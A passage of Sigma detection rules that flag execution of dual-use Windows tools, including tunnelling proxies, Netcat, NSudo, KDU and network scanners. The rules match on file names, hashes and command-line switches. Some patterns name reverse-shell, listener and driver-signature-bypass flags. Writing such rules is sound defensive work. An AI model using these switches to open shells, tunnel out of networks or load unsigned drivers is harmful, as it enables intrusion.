    "content": "title: PUA - Crassus Execution\nid: 2c32b543-1058-4808-91c6-5b31b8bed6c5\nstatus: test\ndescription: Detects Crassus, a Windows privilege escalation discovery tool, based on PE metadata characteristics.\nreferences:\n    - https://github.com/vu-ls/Crassus\nauthor: pH-T (Nextron Systems)\ndate: 2023-04-17\ntags:\n    - attack.discovery\n    - attack.reconnaissance\n    - attack.t1590.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\Crassus.exe'\n        - OriginalFileName: 'Crassus.exe'\n        - Description|contains: 'Crassus'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_csexec.yml",
    "content": "title: PUA - CsExec Execution\nid: d08a2711-ee8b-4323-bdec-b7d85e892b31\nstatus: test\ndescription: Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative\nreferences:\n    - https://github.com/malcomvetter/CSExec\n    - https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-08-22\nmodified: 2023-02-21\ntags:\n    - attack.resource-development\n    - attack.t1587.001\n    - attack.execution\n    - attack.t1569.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\csexec.exe'\n    selection_pe:\n        Description: 'csexec'\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_defendercheck.yml",
    "content": "title: PUA - DefenderCheck Execution\nid: f0ca6c24-3225-47d5-b1f5-352bf07ecfa7\nstatus: test\ndescription: Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.\nreferences:\n    - https://github.com/matterpreter/DefenderCheck\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-08-30\nmodified: 2023-02-04\ntags:\n    - attack.defense-evasion\n    - attack.t1027.005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\DefenderCheck.exe'\n        - Description: 'DefenderCheck'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_ditsnap.yml",
    "content": "title: PUA - DIT Snapshot Viewer\nid: d3b70aad-097e-409c-9df2-450f80dc476b\nstatus: test\ndescription: Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.\nreferences:\n    - https://thedfirreport.com/2020/06/21/snatch-ransomware/\n    - https://web.archive.org/web/20201124182207/https://github.com/yosqueoy/ditsnap\nauthor: Furkan Caliskan (@caliskanfurkan_)\ndate: 2020-07-04\nmodified: 2023-02-21\ntags:\n    - attack.credential-access\n    - attack.t1003.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\ditsnap.exe'\n        - CommandLine|contains: 'ditsnap.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate admin usage\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_frp.yml",
    "content": "title: PUA - Fast Reverse Proxy (FRP) Execution\nid: 32410e29-5f94-4568-b6a3-d91a8adad863\nstatus: test\ndescription: Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.\nreferences:\n    - https://asec.ahnlab.com/en/38156/\n    - https://github.com/fatedier/frp\nauthor: frack113, Florian Roth\ndate: 2022-09-02\nmodified: 2024-11-23\ntags:\n    - attack.command-and-control\n    - attack.t1090\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith:\n            - '\\frpc.exe'\n            - '\\frps.exe'\n    selection_cli:\n        CommandLine|contains: '\\frpc.ini'\n    selection_hashes:\n        # v0.44.0\n        Hashes|contains:\n            - \"MD5=7D9C233B8C9E3F0EA290D2B84593C842\"\n            - \"SHA1=06DDC9280E1F1810677935A2477012960905942F\"\n            - \"SHA256=57B0936B8D336D8E981C169466A15A5FD21A7D5A2C7DAF62D5E142EE860E387C\"\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate use\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_iox.yml",
    "content": "title: PUA- IOX Tunneling Tool Execution\nid: d7654f02-e04b-4934-9838-65c46f187ebc\nstatus: test\ndescription: Detects the use of IOX - a tool for port forwarding and intranet proxy purposes\nreferences:\n    - https://github.com/EddieIvan01/iox\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-10-08\nmodified: 2024-11-23\ntags:\n    - attack.command-and-control\n    - attack.t1090\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\iox.exe'\n    selection_commandline:\n        CommandLine|contains:\n            - '.exe fwd -l '\n            - '.exe fwd -r '\n            - '.exe proxy -l '\n            - '.exe proxy -r '\n    selection_hashes:\n        # v0.4\n        Hashes|contains:\n            - \"MD5=9DB2D314DD3F704A02051EF5EA210993\"\n            - \"SHA1=039130337E28A6623ECF9A0A3DA7D92C5964D8DD\"\n            - \"SHA256=C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731\"\n    condition: 1 of selection*\nfalsepositives:\n    - Legitimate use\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_kdu_driver_tool.yml",
    "content": "title: PUA - Kernel Driver Utility (KDU) Execution\nid: e76ca062-4de0-4d79-8d90-160a0d335eca\nstatus: experimental\ndescription: |\n    Detects execution of the Kernel Driver Utility (KDU) tool.\n    KDU can be used to bypass driver signature enforcement and load unsigned or malicious drivers into the Windows kernel.\n    Potentially allowing for privilege escalation, persistence, or evasion of security controls.\nreferences:\n    - https://github.com/h4rmy/KDU\n    - https://huntress.com/blog/esxi-vm-escape-exploit\nauthor: Matt Anderson, Dray Agha, Anna Pham (Huntress)\ndate: 2026-01-02\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\kdu.exe'\n              - '\\hamakaze.exe'\n        - OriginalFileName: 'hamakaze.exe'\n    selection_cli_suspicious:\n        CommandLine|contains:\n            - '-map ' # map driver to the kernel and execute it entry point\n            - '-prv ' # optional, select vulnerability driver provider\n            - '-dse ' # write user defined value to the system DSE state flags; dse=0(disable),dse=1(enable)\n            - '-ps ' #  modify process object of given ProcessID;\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate driver development, testing, or administrative troubleshooting (e.g., enabling/disabling hardware)\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_pua_kdu_driver_tool/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_mouselock_execution.yml",
    "content": "title: PUA - Mouse Lock Execution\nid: c9192ad9-75e5-43eb-8647-82a0a5b493e3\nstatus: test\ndescription: In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool \"Mouse Lock\" as being used for both credential access and collection in security incidents.\nreferences:\n    - https://github.com/klsecservices/Publications/blob/657deb6a6eb6e00669afd40173f425fb49682eaa/Incident-Response-Analyst-Report-2020.pdf\n    - https://sourceforge.net/projects/mouselock/\nauthor: Cian Heasley\ndate: 2020-08-13\nmodified: 2023-02-21\ntags:\n    - attack.credential-access\n    - attack.collection\n    - attack.t1056.002\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        - Product|contains: 'Mouse Lock'\n        - Company|contains: 'Misc314'\n        - CommandLine|contains: 'Mouse Lock_'\n    condition: selection\nfalsepositives:\n    - Legitimate uses of Mouse Lock software\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_netcat.yml",
    "content": "title: PUA - Netcat Suspicious Execution\nid: e31033fc-33f0-4020-9a16-faf9b31cbf08\nstatus: test\ndescription: Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network\nreferences:\n    - https://nmap.org/ncat/\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md\n    - https://www.revshells.com/\nauthor: frack113, Florian Roth (Nextron Systems)\ndate: 2021-07-21\nmodified: 2023-02-08\ntags:\n    - attack.command-and-control\n    - attack.t1095\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        # can not use OriginalFileName as is empty\n        Image|endswith:\n            - '\\nc.exe'\n            - '\\ncat.exe'\n            - '\\netcat.exe'\n    selection_cmdline:\n        # Typical command lines\n        CommandLine|contains:\n            - ' -lvp '\n            - ' -lvnp'\n            - ' -l -v -p '\n            - ' -lv -p '\n            - ' -l --proxy-type http '\n            # - ' --exec cmd.exe ' # Not specific enough for netcat\n            - ' -vnl --exec '\n            - ' -vnl -e '\n            - ' --lua-exec '\n            - ' --sh-exec '\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate ncat use\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_netscan.yml",
    "content": "title: PUA - SoftPerfect Netscan Execution\nid: ca387a8e-1c84-4da3-9993-028b45342d30\nstatus: test\ndescription: |\n    Detects usage of SoftPerfect's \"netscan.exe\". An application for scanning networks.\n    It is actively used in-the-wild by threat actors to inspect and understand the network architecture of a victim.\nreferences:\n    - https://www.protect.airbus.com/blog/uncovering-cyber-intruders-netscan/\n    - https://secjoes-reports.s3.eu-central-1.amazonaws.com/Sockbot%2Bin%2BGoLand.pdf\n    - https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/\n    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-ransomware-attacks-continue\n    - https://research.nccgroup.com/2022/07/13/climbing-mount-everest-black-byte-bytes-back/\n    - https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/\n    - https://www.softperfect.com/products/networkscanner/\nauthor: '@d4ns4n_ (Wuerth-Phoenix)'\ndate: 2024-04-25\ntags:\n    - attack.discovery\n    - attack.t1046\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\netscan.exe'\n        - Product: 'Network Scanner'\n        - Description: 'Application for scanning networks'\n    condition: selection\nfalsepositives:\n    - Legitimate administrator activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_ngrok.yml",
    "content": "title: PUA - Ngrok Execution\nid: ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31\nstatus: test\ndescription: |\n  Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\n  Involved domains are bin.equinox.io for download and *.ngrok.io for connections.\nreferences:\n    - https://ngrok.com/docs\n    - https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html\n    - https://stackoverflow.com/questions/42442320/ssh-tunnel-to-ngrok-and-initiate-rdp\n    - https://www.virustotal.com/gui/file/58d21840d915aaf4040ceb89522396124c82f325282f805d1085527e1e2ccfa1/detection\n    - https://cybleinc.com/2021/02/15/ngrok-platform-abused-by-hackers-to-deliver-a-new-wave-of-phishing-attacks/\n    - https://twitter.com/xorJosh/status/1598646907802451969\n    - https://www.softwaretestinghelp.com/how-to-use-ngrok/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-05-14\nmodified: 2023-02-21\ntags:\n    - attack.command-and-control\n    - attack.t1572\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        CommandLine|contains:\n            - ' tcp 139'\n            - ' tcp 445'\n            - ' tcp 3389'\n            - ' tcp 5985'\n            - ' tcp 5986'\n    selection2:\n        CommandLine|contains|all:\n            - ' start '\n            - '--all'\n            - '--config'\n            - '.yml'\n    selection3:\n        Image|endswith: 'ngrok.exe'\n        CommandLine|contains:\n            - ' tcp '\n            - ' http '\n            - ' authtoken '\n    selection4:\n        CommandLine|contains:\n            - '.exe authtoken '\n            - '.exe start --all'\n    condition: 1 of selection*\nfalsepositives:\n    - Another tool that uses the command line switches of Ngrok\n    - Ngrok http 3978 (https://learn.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_nimgrab.yml",
    "content": "title: PUA - Nimgrab Execution\nid: 74a12f18-505c-4114-8d0b-8448dd5485c6\nstatus: test\ndescription: Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md\nauthor: frack113\ndate: 2022-08-28\nmodified: 2024-11-23\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_name:\n        Image|endswith: '\\nimgrab.exe'\n    selection_hashes:\n        Hashes|contains:\n            - MD5=2DD44C3C29D667F5C0EF5F9D7C7FFB8B\n            - SHA256=F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559\n            - IMPHASH=C07FDDD21D123EA9B3A08EEF44AAAC45\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate use of Nim on a developer systems\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_nimscan.yml",
    "content": "title: PUA - NimScan Execution\nid: 4fd6b1c7-19b8-4488-97f6-00f0924991a3\nstatus: test\ndescription: |\n    Detects usage of NimScan, a portscanner utility.\n    In early 2025, adversaries were observed using this utility to scan for open ports on remote hosts in a compromised environment.\n    This rule identifies the execution of NimScan based on the process image name and specific hash values associated with different versions of the tool.\nreferences:\n    - https://x.com/cyberfeeddigest/status/1887041526397587859\n    - https://github.com/elddy/NimScan\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-02-05\ntags:\n    - attack.discovery\n    - attack.t1046\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\NimScan.exe' # Other metadata fields such as originalfilename and product were omitted because they were null\n        - Hashes|contains:\n              - 'IMPHASH=41BB1C7571B3A724EB83A1D2B96DBB8C' # v1.0.8\n              - 'IMPHASH=B1B6ADACB172795480179EFD18A29549' # v1.0.6\n              - 'IMPHASH=0D1F896DC7642AD8384F9042F30279C2' # v1.0.4 and v1.0.2\n    condition: selection\nfalsepositives:\n    - Legitimate administrator activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_nircmd.yml",
    "content": "title: PUA - NirCmd Execution\nid: 4e2ed651-1906-4a59-a78a-18220fca1b22\nstatus: test\ndescription: Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity\nreferences:\n    - https://www.nirsoft.net/utils/nircmd.html\n    - https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/\n    - https://www.nirsoft.net/utils/nircmd2.html#using\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-01-24\nmodified: 2023-02-13\ntags:\n    - attack.execution\n    - attack.t1569.002\n    - attack.s0029\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_org:\n        - Image|endswith: '\\NirCmd.exe'\n        - OriginalFileName: 'NirCmd.exe'\n    selection_cmd:\n        CommandLine|contains:\n            - ' execmd '\n            - '.exe script '\n            - '.exe shexec '\n            - ' runinteractive '\n    combo_exec:\n        CommandLine|contains:\n            - ' exec '\n            - ' exec2 '\n    combo_exec_params:\n        CommandLine|contains:\n            - ' show '\n            - ' hide '\n    condition: 1 of selection_* or all of combo_*\nfalsepositives:\n    - Legitimate use by administrators\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_nircmd_as_system.yml",
    "content": "title: PUA - NirCmd Execution As LOCAL SYSTEM\nid: d9047477-0359-48c9-b8c7-792cedcdc9c4\nstatus: test\ndescription: Detects the use of NirCmd tool for command execution as SYSTEM user\nreferences:\n    - https://www.nirsoft.net/utils/nircmd.html\n    - https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/\n    - https://www.nirsoft.net/utils/nircmd2.html#using\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-01-24\nmodified: 2023-02-13\ntags:\n    - attack.execution\n    - attack.t1569.002\n    - attack.s0029\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: ' runassystem '\n    condition: selection\nfalsepositives:\n    - Legitimate use by administrators\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_nmap_zenmap.yml",
    "content": "title: PUA - Nmap/Zenmap Execution\nid: f6ecd1cf-19b8-4488-97f6-00f0924991a3\nstatus: test\ndescription: Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation\nreferences:\n    - https://nmap.org/\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-3---port-scan-nmap-for-windows\nauthor: frack113\ndate: 2021-12-10\nmodified: 2023-12-11\ntags:\n    - attack.discovery\n    - attack.t1046\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith:\n              - '\\nmap.exe'\n              - '\\zennmap.exe'\n        - OriginalFileName:\n              - 'nmap.exe'\n              - 'zennmap.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate administrator activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_nps.yml",
    "content": "title: PUA - NPS Tunneling Tool Execution\nid: 68d37776-61db-42f5-bf54-27e87072d17e\nstatus: test\ndescription: Detects the use of NPS, a port forwarding and intranet penetration proxy server\nreferences:\n    - https://github.com/ehang-io/nps\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-10-08\nmodified: 2024-11-23\ntags:\n    - attack.command-and-control\n    - attack.t1090\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith: '\\npc.exe'\n    selection_cli_1:\n        CommandLine|contains|all:\n            - ' -server='\n            - ' -vkey='\n            - ' -password='\n    selection_cli_2:\n        CommandLine|contains: ' -config=npc'\n    selection_hashes:\n        # v0.26.10\n        Hashes|contains:\n            - \"MD5=AE8ACF66BFE3A44148964048B826D005\"\n            - \"SHA1=CEA49E9B9B67F3A13AD0BE1C2655293EA3C18181\"\n            - \"SHA256=5A456283392FFCEEEACA3D3426C306EB470304637520D72FED1CC1FEBBBD6856\"\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate use\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_nsudo.yml",
    "content": "title: PUA - NSudo Execution\nid: 771d1eb5-9587-4568-95fb-9ec44153a012\nstatus: test\ndescription: Detects the use of NSudo tool for command execution\nreferences:\n    - https://web.archive.org/web/20221019044836/https://nsudo.m2team.org/en-us/\n    - https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali\ndate: 2022-01-24\nmodified: 2023-02-13\ntags:\n    - attack.execution\n    - attack.t1569.002\n    - attack.s0029\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\NSudo.exe'\n              - '\\NSudoLC.exe'\n              - '\\NSudoLG.exe'\n        - OriginalFileName:\n              - 'NSudo.exe'\n              - 'NSudoLC.exe'\n              - 'NSudoLG.exe'\n    selection_cli:\n        CommandLine|contains:\n            # Covers Single/Double dash \"-\"/\"--\" + \":\"\n            - '-U:S ' # System\n            - '-U:T ' # Trusted Installer\n            - '-U:E ' # Elevated\n            - '-P:E ' # Enable All Privileges\n            - '-M:S ' # System Integrity\n            - '-M:H ' # High Integrity\n            # Covers Single/Double dash \"-\"/\"--\" + \"=\"\n            - '-U=S '\n            - '-U=T '\n            - '-U=E '\n            - '-P=E '\n            - '-M=S '\n            - '-M=H '\n            - '-ShowWindowMode:Hide'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use by administrators\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_pingcastle.yml",
    "content": "title: PUA - PingCastle Execution\nid: b1cb4ab6-ac31-43f4-adf1-d9d08957419c\nrelated:\n    - id: b37998de-a70b-4f33-b219-ec36bf433dc0\n      type: derived\nstatus: test\ndescription: Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level.\nreferences:\n    - https://github.com/vletoux/pingcastle\n    - https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/\n    - https://github.com/fengjixuchui/Start-ADEnum/blob/e237a739db98b6104427d833004836507da36a58/Functions/Start-ADEnum.ps1#L450\n    - https://github.com/lkys37en/Start-ADEnum/blob/5b42c54215fe5f57fc59abc52c20487d15764005/Functions/Start-ADEnum.ps1#L680\n    - https://github.com/projectHULK/AD_Recon/blob/dde2daba9b3393a9388cbebda87068972cc0bd3b/SecurityAssessment.ps1#L2699\n    - https://github.com/802-1x/Compliance/blob/2e53df8b6e89686a0b91116b3f42c8f717dca820/Ping%20Castle/Get-PingCastle-HTMLComplianceReport.ps1#L8\n    - https://github.com/EvotecIT/TheDashboard/blob/481a9ce8f82f2fd55fe65220ee6486bae6df0c9d/Examples/RunReports/PingCastle.ps1\nauthor: Nasreddine Bencherchali (Nextron Systems), frack113\ndate: 2024-01-11\ntags:\n    - attack.reconnaissance\n    - attack.t1595\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Hashes|contains:\n              # PingCastle.exe\n              - 'MD5=f741f25ac909ee434e50812d436c73ff'\n              - 'MD5=d40acbfc29ee24388262e3d8be16f622'\n              - 'MD5=01bb2c16fadb992fa66228cd02d45c60'\n              - 'MD5=9e1b18e62e42b5444fc55b51e640355b'\n              - 'MD5=b7f8fe33ac471b074ca9e630ba0c7e79'\n              - 'MD5=324579d717c9b9b8e71d0269d13f811f'\n              - 'MD5=63257a1ddaf83cfa43fe24a3bc06c207'\n              - 'MD5=049e85963826b059c9bac273bb9c82ab'\n              - 'MD5=ecb98b7b4d4427eb8221381154ff4cb2'\n              - 'MD5=faf87749ac790ec3a10dd069d10f9d63'\n              - 'MD5=f296dba5d21ad18e6990b1992aea8f83'\n              - 'MD5=93ba94355e794b6c6f98204cf39f7a11'\n              - 'MD5=a258ef593ac63155523a461ecc73bdba'\n              - 'MD5=97000eb5d1653f1140ee3f47186463c4'\n              - 'MD5=95eb317fbbe14a82bd9fdf31c48b8d93'\n              - 'MD5=32fe9f0d2630ac40ea29023920f20f49'\n              - 'MD5=a05930dde939cfd02677fc18bb2b7df5'\n              - 'MD5=124283924e86933ff9054a549d3a268b'\n              - 'MD5=ceda6909b8573fdeb0351c6920225686'\n              - 'MD5=60ce120040f2cd311c810ae6f6bbc182'\n              - 'MD5=2f10cdc5b09100a260703a28eadd0ceb'\n              - 'MD5=011d967028e797a4c16d547f7ba1463f'\n              - 'MD5=2da9152c0970500c697c1c9b4a9e0360'\n              - 'MD5=b5ba72034b8f44d431f55275bace9f8b'\n              - 'MD5=d6ed9101df0f24e27ff92ddab42dacca'\n              - 'MD5=3ed3cdb6d12aa1ac562ad185cdbf2d1d'\n              - 'MD5=5e083cd0143ae95a6cb79b68c07ca573'\n              - 'MD5=28caff93748cb84be70486e79f04c2df'\n              - 'MD5=9d4f12c30f9b500f896efd1800e4dd11'\n              - 'MD5=4586f7dd14271ad65a5fb696b393f4c0'\n              - 'MD5=86ba9dddbdf49215145b5bcd081d4011'\n              - 'MD5=9dce0a481343874ef9a36c9a825ef991'\n              - 'MD5=85890f62e231ad964b1fda7a674747ec'\n              - 'MD5=599be548da6441d7fe3e9a1bb8cb0833'\n              - 'MD5=9b0c7fd5763f66e9b8c7b457fce53f96'\n              - 'MD5=32d45718164205aec3e98e0223717d1d'\n              - 'MD5=6ff5f373ee7f794cd17db50704d00ddb'\n              - 'MD5=88efbdf41f0650f8f58a3053b0ca0459'\n              - 'MD5=ef915f61f861d1fb7cbde9afd2e7bd93'\n              - 'MD5=781fa16511a595757154b4304d2dd350'\n              - 'MD5=5018ec39be0e296f4fc8c8575bfa8486'\n              - 'MD5=f4a84d6f1caf0875b50135423d04139f'\n              - 'SHA1=9c1431801fa6342ed68f047842b9a11778fc669b'\n              - 'SHA1=c36c862f40dad78cb065197aad15fef690c262f2'\n              - 'SHA1=bc8e23faea8b3c537f268b3e81d05b937012272d'\n              - 'SHA1=12e0357658614ff60d480d1a6709be68a2e40c5f'\n              - 'SHA1=18b33ab5719966393d424a3edbfa8dec225d98fa'\n              - 'SHA1=f14c9633040897d375e3069fddc71e859f283778'\n              - 'SHA1=08041b426c9f112ad2061bf3c8c718e34739d4fc'\n              - 'SHA1=7be77c885d0c9a4af4cecc64d512987cf93ba937'\n              - 'SHA1=72dbb719b05f89d9d2dbdf186714caf7639daa36'\n              - 'SHA1=5b1498beb2cfb4d971e377801e7abce62c0e315b'\n              - 'SHA1=292629c6ab33bddf123d26328025e2d157d9e8fc'\n              - 'SHA1=be59e621e83a2d4c87b0e6c69a2d22f175408b11'\n              - 'SHA1=0250ce9a716ab8cca1c70a9de4cbc49a51934995'\n              - 'SHA1=607e1fa810c799735221a609af3bfc405728c02d'\n              - 'SHA1=ab1c547f6d1c07a9e0a01e46adea3aae1cac12e3'\n              - 'SHA1=044cf5698a8e6b0aeba5acb56567f06366a9a70a'\n              - 'SHA1=ef2dea8c736d49607832986c6c2d6fdd68ba6491'\n              - 'SHA1=efffc2bfb8af2e3242233db9a7109b903fc3f178'\n              - 'SHA1=5a05d4320de9afbc84de8469dd02b3a109efb2d4'\n              - 'SHA1=a785d88cf8b862a420b9be793ee6a9616aa94c84'\n              - 'SHA1=5688d56cbaf0d934c4e37b112ba257e8fb63f4ea'\n              - 'SHA1=5cd2ada1c26815fbfd6a0cd746d5d429c0d83a17'\n              - 'SHA1=81d67b3d70c4e855cb11a453cc32997517708362'\n              - 'SHA1=9cffce9de95e0109f4dfecce0ab2cb0a59cc58ad'\n              - 'SHA1=09c6930d057f49c1c1e11cf9241fffc8c12df3a2'\n              - 'SHA1=e27bf7db8d96db9d4c8a06ee5e9b8e9fcb86ac92'\n              - 'SHA1=9e3c992415e390f9ada4d15c693b687f38a492d1'\n              - 'SHA1=3f34a5ee303d37916584c888c4928e1c1164f92a'\n              - 'SHA1=ea4c8c56a8f5c90a4c08366933e5fb2de611d0db'\n              - 'SHA1=3150f14508ee4cae19cf09083499d1cda8426540'\n              - 'SHA1=036ad9876fa552b1298c040e233d620ea44689c6'\n              - 'SHA1=3a3c1dcb146bb4616904157344ce1a82cd173bf5'\n              - 'SHA1=6230d6fca973fa26188dfbadede57afb4c15f75c'\n              - 'SHA1=8f7b2a9b8842f339b1e33602b7f926ab65de1a4d'\n              - 'SHA1=a586bb06b59a4736a47abff8423a54fe8e2c05c4'\n              - 'SHA1=c82152cddf9e5df49094686531872ecd545976db'\n              - 'SHA1=04c39ffc18533100aaa4f9c06baf2c719ac94a61'\n              - 'SHA1=e082affa5cdb2d46452c6601a9e85acb8446b836'\n              - 'SHA1=a075bfb6cf5c6451ce682197a87277c8bc188719'\n              - 'SHA1=34c0c5839af1c92bce7562b91418443a2044c90d'\n              - 'SHA1=74e10a9989e0ec8fe075537ac802bd3031ae7e08'\n              - 'SHA1=3a515551814775df0ccbe09f219bc972eae45a10'\n              - 'SHA256=90fd5b855b5107e7abaaefb6e658f50d5d6e08ac28e35f31d8b03dcabf77872b'\n              - 'SHA256=5836c24f233f77342fee825f3cad73caab7ab4fb65ec2aec309fd12bc1317e85'\n              - 'SHA256=e850e54b12331249c357a20604281b9abf8a91e6f3d957463fc625e6b126ef03'\n              - 'SHA256=9e752f29edcd0db9931c20b173eee8d4d8196f87382c68a6e7eb4c8a44d58795'\n              - 'SHA256=7a8c127d6c41f80d178d2315ed2f751ac91b1cd54d008af13680e04f068f426f'\n              - 'SHA256=9f65e1c142c4f814e056a197a2241fd09e09acf245c62897109871137321a72a'\n              - 'SHA256=c9b52d03c66d54d6391c643b3559184b1425c84a372081ec2bfed07ebf6af275'\n              - 'SHA256=1b96f6218498aa6baf6f6c15b8f99e542077e33feb1ab5472bbbf7d4de43eb6b'\n              - 'SHA256=768021fc242054decc280675750dec0a9e74e764b8646864c58756fa2386d2a2'\n              - 'SHA256=1e1b32bef31be040f0f038fcb5a2d68fb192daaef23c6167f91793d21e06ebae'\n              - 'SHA256=606bd75ed9d2d6107ea7ee67063d1761a99f2fb5e932c8344d11395d24587dd6'\n              - 'SHA256=b489d3cdd158f040322ae5c8d0139ad28eff743c738a10f2d0255c7e149bd92a'\n              - 'SHA256=ca7ecf04a8ad63aff330492c15270d56760cb223a607cdb1431fb00e1b9985d1'\n              - 'SHA256=9dc4fca72463078b70f6516559a179c78400b06534e63ee12fb38adbe2632559'\n              - 'SHA256=c00d2aee59bac087d769e09b5b7f832176f7714fefdc6af2502e6031e3eb37c2'\n              - 'SHA256=a8e96d564687064190eaf865774f773def05fdbf651aa5bbf66216c077b863ef'\n              - 'SHA256=84ed328cee2a0505e87662faf6fc57915e3a831c97ee88ad691f5c63522e139d'\n              - 'SHA256=c143de99c57965d3a44c1fce6a97c2773b050609c1ea7f45688a4ca2422a5524'\n              - 